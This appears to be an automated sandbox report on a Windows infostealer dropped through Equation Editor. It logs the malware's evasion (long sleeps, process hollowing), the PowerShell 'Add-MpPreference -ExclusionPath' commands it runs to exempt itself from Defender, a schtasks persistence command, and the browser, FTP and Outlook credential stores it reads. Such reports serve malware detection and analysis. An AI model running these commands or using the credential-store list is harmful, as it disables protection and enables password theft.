                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe TID: 3764Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe TID: 3484Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3808Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3924Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_0040317B mov eax, dword ptr fs:[00000030h]21_2_0040317B
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeCode function: 21_2_00402B7C GetProcessHeap,HeapAlloc,21_2_00402B7C
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory written: C:\Users\user\AppData\Roaming\sharon38892.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory written: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe base: 400000 value starts with: 4D5A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"Jump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeQueries volume information: C:\Users\user\AppData\Roaming\sharon38892.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeQueries volume information: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0000000C.00000002.618205629.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sharon38892.exe PID: 3376, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
